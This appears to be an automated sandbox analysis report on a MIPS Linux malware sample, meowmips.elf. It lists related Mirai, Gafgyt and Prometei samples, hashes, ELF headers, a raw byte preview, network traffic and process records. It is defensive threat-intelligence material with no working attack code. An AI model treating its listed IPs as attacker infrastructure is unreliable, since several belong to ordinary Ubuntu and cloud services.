                                                          mpsl.elfGet hashmaliciousUnknownBrowse
                                                            sync.x86.elfGet hashmaliciousUnknownBrowse
                                                              sync.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                sync.arm4.elfGet hashmaliciousUnknownBrowse
                                                                  bin.sh.elfGet hashmaliciousUnknownBrowse
                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                      No context
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CANONICAL-ASGBsync.arm6.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      aarch64.elfGet hashmaliciousMiraiBrowse
                                                                      • 91.189.91.42
                                                                      sync.superh.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      sync.arm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      sync.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                      • 185.125.190.26
                                                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      sync.x86.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      sync.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      sync.arm4.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      bin.sh.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      CANONICAL-ASGBsync.arm6.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      aarch64.elfGet hashmaliciousMiraiBrowse
                                                                      • 91.189.91.42
                                                                      sync.superh.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      sync.arm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      sync.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                      • 185.125.190.26
                                                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      sync.x86.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      sync.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      sync.arm4.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      bin.sh.elfGet hashmaliciousUnknownBrowse
                                                                      • 91.189.91.42
                                                                      AMAZON-02USsync.superh.elfGet hashmaliciousUnknownBrowse
                                                                      • 34.249.145.219
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 54.170.242.139
                                                                      sync.arm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 34.249.145.219
                                                                      sync.mips.elfGet hashmaliciousUnknownBrowse
                                                                      • 54.171.230.55
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 34.249.145.219
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 34.254.182.186
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 34.249.145.219
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 54.170.242.139
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 34.249.145.219
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 34.249.145.219
                                                                      INIT7CHsync.arm6.elfGet hashmaliciousUnknownBrowse
                                                                      • 109.202.202.202
                                                                      aarch64.elfGet hashmaliciousMiraiBrowse
                                                                      • 109.202.202.202
                                                                      sync.superh.elfGet hashmaliciousUnknownBrowse
                                                                      • 109.202.202.202
                                                                      sync.arm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 109.202.202.202
                                                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                                                      • 109.202.202.202
                                                                      sync.x86.elfGet hashmaliciousUnknownBrowse
                                                                      • 109.202.202.202
                                                                      sync.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                      • 109.202.202.202
                                                                      sync.arm4.elfGet hashmaliciousUnknownBrowse
                                                                      • 109.202.202.202
                                                                      bin.sh.elfGet hashmaliciousUnknownBrowse
                                                                      • 109.202.202.202
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 109.202.202.202
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      fb4726d465c5f28b84cd6d14cedd13a7sync.mips.elfGet hashmaliciousUnknownBrowse
                                                                      • 54.171.230.55
                                                                      bin.sh.elfGet hashmaliciousMiraiBrowse
                                                                      • 54.171.230.55
                                                                      Okami.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 54.171.230.55
                                                                      Okami.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 54.171.230.55
                                                                      sshd.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 54.171.230.55
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 54.171.230.55
                                                                      wget.elfGet hashmaliciousGafgytBrowse
                                                                      • 54.171.230.55
                                                                      apache2.elfGet hashmaliciousGafgytBrowse
                                                                      • 54.171.230.55
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                      • 54.171.230.55
                                                                      SecuriteInfo.com.Linux.Mirai.2522.5402.17083.elfGet hashmaliciousUnknownBrowse
                                                                      • 54.171.230.55
                                                                      No context
                                                                      Process:/tmp/meowmips.elf
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):370
                                                                      Entropy (8bit):3.8672930224091293
                                                                      Encrypted:false
                                                                      SSDEEP:6:URINDFdfcz/VUB4DFdC4/VKAvVVyAb/3hM/V+4D/VH:IIt7DBw2baVIAbRMfF
                                                                      MD5:B3BAFE41962425E7E39FF20BF135E78A
                                                                      SHA1:25A74D808E61249BD4369BC20E95F00AF4E3E8D0
                                                                      SHA-256:8642E7A614673CAF5C861BFDADF6F266258972F9C10CAFA623151519031A9A35
                                                                      SHA-512:512ECAAE32FA700CD07F8A9827A884248624B56E4C9D66D56809AE2A824F0D974D776CF62A92F1E8C70C3E10116B877A4E35948248AFF9C5D5E4720B5AA4614F
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:400000-41d000 r-xp 00000000 fd:00 531606 /tmp/meowmips.elf.45d000-45e000 rw-p 0001d000 fd:00 531606 /tmp/meowmips.elf.45e000-468000 rw-p 00000000 00:00 0 .7f7fe000-7f7ff000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so.7f7ff000-7f800000 ---p 00000000 00:00 0 .7f800000-80000000 rw-p 00000000 00:00 0 [stack].
                                                                      Process:/tmp/meowmips.elf
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):18
                                                                      Entropy (8bit):3.5724312513221195
                                                                      Encrypted:false
                                                                      SSDEEP:3:Tg58Cn:TgiC
                                                                      MD5:C3C3DB4878EEAA444050E77A2A00D47B
                                                                      SHA1:48DF97D85142A1C450B54CEBD0AC921276D8D60D
                                                                      SHA-256:408A43240150C29DD7EE18F6D5EF1414BC25DEC87E221B95D6EFE779AA4BE27A
                                                                      SHA-512:0C8CFC072DE8B2F755F180C6F85A8076E733D36ED59A5442135EEF91974364164A2B3FD53DFAC039FF2C9B2C26B3DDF5CA80461E2D4FC0D0C660507CD01CEBA8
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:/tmp/meowmips.elf.
                                                                      Process:/tmp/meowmips.elf
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):18
                                                                      Entropy (8bit):3.5724312513221195
                                                                      Encrypted:false
                                                                      SSDEEP:3:Tg58Cn:TgiC
                                                                      MD5:C3C3DB4878EEAA444050E77A2A00D47B
                                                                      SHA1:48DF97D85142A1C450B54CEBD0AC921276D8D60D
                                                                      SHA-256:408A43240150C29DD7EE18F6D5EF1414BC25DEC87E221B95D6EFE779AA4BE27A
                                                                      SHA-512:0C8CFC072DE8B2F755F180C6F85A8076E733D36ED59A5442135EEF91974364164A2B3FD53DFAC039FF2C9B2C26B3DDF5CA80461E2D4FC0D0C660507CD01CEBA8
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:/tmp/meowmips.elf.
                                                                      Process:/tmp/meowmips.elf
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):18
                                                                      Entropy (8bit):3.5724312513221195
                                                                      Encrypted:false
                                                                      SSDEEP:3:Tg58Cn:TgiC
                                                                      MD5:C3C3DB4878EEAA444050E77A2A00D47B
                                                                      SHA1:48DF97D85142A1C450B54CEBD0AC921276D8D60D
                                                                      SHA-256:408A43240150C29DD7EE18F6D5EF1414BC25DEC87E221B95D6EFE779AA4BE27A
                                                                      SHA-512:0C8CFC072DE8B2F755F180C6F85A8076E733D36ED59A5442135EEF91974364164A2B3FD53DFAC039FF2C9B2C26B3DDF5CA80461E2D4FC0D0C660507CD01CEBA8
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:/tmp/meowmips.elf.
                                                                      File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                                      Entropy (8bit):5.604283900850302
                                                                      TrID:
                                                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                      File name:meowmips.elf
                                                                      File size:122'200 bytes
                                                                      MD5:0c893d7bd9411398fd1f1fb4f625cf0c
                                                                      SHA1:b1829dbcc5aac316beaa75e85e49c555bc1c6143
                                                                      SHA256:445620c74ab4d7f8dc3bdee1a98076ca80381616e9067d6f64823c01cc8f3080
                                                                      SHA512:0be1e236898d7d5fc0c8867b4567367abc104b037da5d6ea1dc2bb432f7a24e7ca877dcb3f123925af86a4d9c0edd3c3a2a91f27c52cda3fb7241fc0645011e9
                                                                      SSDEEP:3072:73ZDhBdQilzIb5ZmSU8IlZPjlkdYfWppYwn39IZ5nqTE:jZDh3RNIbCNKzBN1A
                                                                      TLSH:69C3B50E2E358F6DF76DC33587B74A31A76863D626E0C689D26CF9151E2034D640FBA8
                                                                      File Content Preview:.ELF.....................@.`...4...P.....4. ...(.............@...@.....`...`.................E...E........nd........dt.Q............................<...'.T|...!'.......................<...'.TX...!... ....'9... ......................<...'.T(...!........'9.

                                                                      ELF header

                                                                      Class:ELF32
                                                                      Data:2's complement, big endian
                                                                      Version:1 (current)
                                                                      Machine:MIPS R3000
                                                                      Version Number:0x1
                                                                      Type:EXEC (Executable file)
                                                                      OS/ABI:UNIX - System V
                                                                      ABI Version:0
                                                                      Entry Point Address:0x400260
                                                                      Flags:0x1007
                                                                      ELF Header Size:52
                                                                      Program Header Offset:52
                                                                      Program Header Size:32
                                                                      Number of Program Headers:3
                                                                      Section Header Offset:121680
                                                                      Section Header Size:40
                                                                      Number of Section Headers:13
                                                                      Header String Table Index:12
                                                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                      NULL0x00x00x00x00x0000
                                                                      .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                                      .textPROGBITS0x4001200x1200x19b900x00x6AX0016
                                                                      .finiPROGBITS0x419cb00x19cb00x5c0x00x6AX004
                                                                      .rodataPROGBITS0x419d100x19d100x2d500x00x2A0016
                                                                      .ctorsPROGBITS0x45d0000x1d0000x80x00x3WA004
                                                                      .dtorsPROGBITS0x45d0080x1d0080x80x00x3WA004
                                                                      .data.rel.roPROGBITS0x45d0140x1d0140xa80x00x3WA004
                                                                      .dataPROGBITS0x45d0c00x1d0c00x4540x00x3WA0016
                                                                      .gotPROGBITS0x45d5200x1d5200x5d80x40x10000003WAp0016
                                                                      .sbssNOBITS0x45daf80x1daf80x1c0x00x10000003WAp004
                                                                      .bssNOBITS0x45db200x1daf80x63440x00x3WA0016
                                                                      .shstrtabSTRTAB0x00x1daf80x560x00x0001
                                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                      LOAD0x00x4000000x4000000x1ca600x1ca605.66430x5R E0x10000.init .text .fini .rodata
                                                                      LOAD0x1d0000x45d0000x45d0000xaf80x6e644.12110x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                                                      Download Network PCAP: filteredfull

                                                                      • Total Packets: 14
                                                                      • 443 (HTTPS)
                                                                      • 80 (HTTP)
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Mar 28, 2025 04:34:11.497333050 CET43928443192.168.2.2391.189.91.42
                                                                      Mar 28, 2025 04:34:13.755649090 CET33606443192.168.2.2354.171.230.55
                                                                      Mar 28, 2025 04:34:13.986612082 CET4433360654.171.230.55192.168.2.23
                                                                      Mar 28, 2025 04:34:13.986723900 CET33606443192.168.2.2354.171.230.55
                                                                      Mar 28, 2025 04:34:14.154723883 CET4433360654.171.230.55192.168.2.23
                                                                      Mar 28, 2025 04:34:15.108009100 CET4433360654.171.230.55192.168.2.23
                                                                      Mar 28, 2025 04:34:15.108040094 CET4433360654.171.230.55192.168.2.23
                                                                      Mar 28, 2025 04:34:15.108053923 CET4433360654.171.230.55192.168.2.23
                                                                      Mar 28, 2025 04:34:15.108067989 CET4433360654.171.230.55192.168.2.23
                                                                      Mar 28, 2025 04:34:15.108105898 CET33606443192.168.2.2354.171.230.55
                                                                      Mar 28, 2025 04:34:15.108175993 CET33606443192.168.2.2354.171.230.55
                                                                      Mar 28, 2025 04:34:15.108175993 CET33606443192.168.2.2354.171.230.55
                                                                      Mar 28, 2025 04:34:15.108175993 CET33606443192.168.2.2354.171.230.55
                                                                      Mar 28, 2025 04:34:16.872704029 CET42836443192.168.2.2391.189.91.43
                                                                      Mar 28, 2025 04:34:17.896528006 CET4251680192.168.2.23109.202.202.202
                                                                      Mar 28, 2025 04:34:32.742693901 CET43928443192.168.2.2391.189.91.42
                                                                      Mar 28, 2025 04:34:42.981587887 CET42836443192.168.2.2391.189.91.43
                                                                      Mar 28, 2025 04:34:49.124622107 CET4251680192.168.2.23109.202.202.202
                                                                      Mar 28, 2025 04:35:13.697365046 CET43928443192.168.2.2391.189.91.42
                                                                      Mar 28, 2025 04:35:34.174675941 CET42836443192.168.2.2391.189.91.43
                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                      Mar 28, 2025 04:34:15.108053923 CET54.171.230.55443192.168.2.2333606CN=motd.ubuntu.com CN=R10, O=Let's Encrypt, C=USCN=R10, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USSat Mar 22 09:18:05 CET 2025 Wed Mar 13 01:00:00 CET 2024Fri Jun 20 10:18:04 CEST 2025 Sat Mar 13 00:59:59 CET 2027771,4866-4867-4865-49196-49200-163-159-52393-52392-52394-49327-49325-49315-49311-49245-49249-49239-49235-49195-49199-162-158-49326-49324-49314-49310-49244-49248-49238-49234-49188-49192-107-106-49267-49271-196-195-49187-49191-103-64-49266-49270-190-189-49162-49172-57-56-136-135-49161-49171-51-50-69-68-157-49313-49309-49233-156-49312-49308-49232-61-192-60-186-53-132-47-65-255,0-11-10-35-22-23-13-43-45-51,29-23-30-25-24,0-1-2fb4726d465c5f28b84cd6d14cedd13a7
                                                                      CN=R10, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027

                                                                      System Behavior

                                                                      Start time (UTC):03:34:12
                                                                      Start date (UTC):28/03/2025
                                                                      Path:/tmp/meowmips.elf
                                                                      Arguments:-
                                                                      File size:5777432 bytes
                                                                      MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                      Start time (UTC):03:34:12
                                                                      Start date (UTC):28/03/2025
                                                                      Path:/usr/bin/dash
                                                                      Arguments:-
                                                                      File size:129816 bytes
                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                      Start time (UTC):03:34:12
                                                                      Start date (UTC):28/03/2025
                                                                      Path:/usr/bin/rm
                                                                      Arguments:rm -f /tmp/tmp.2AcxkoTNCi /tmp/tmp.zEzo0dTEWY /tmp/tmp.WezqumFwV9
                                                                      File size:72056 bytes
                                                                      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                      Start time (UTC):03:34:12
                                                                      Start date (UTC):28/03/2025
                                                                      Path:/usr/bin/dash
                                                                      Arguments:-
                                                                      File size:129816 bytes
                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                      Start time (UTC):03:34:12
                                                                      Start date (UTC):28/03/2025
                                                                      Path:/usr/bin/rm
                                                                      Arguments:rm -f /tmp/tmp.2AcxkoTNCi /tmp/tmp.zEzo0dTEWY /tmp/tmp.WezqumFwV9
                                                                      File size:72056 bytes
                                                                      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b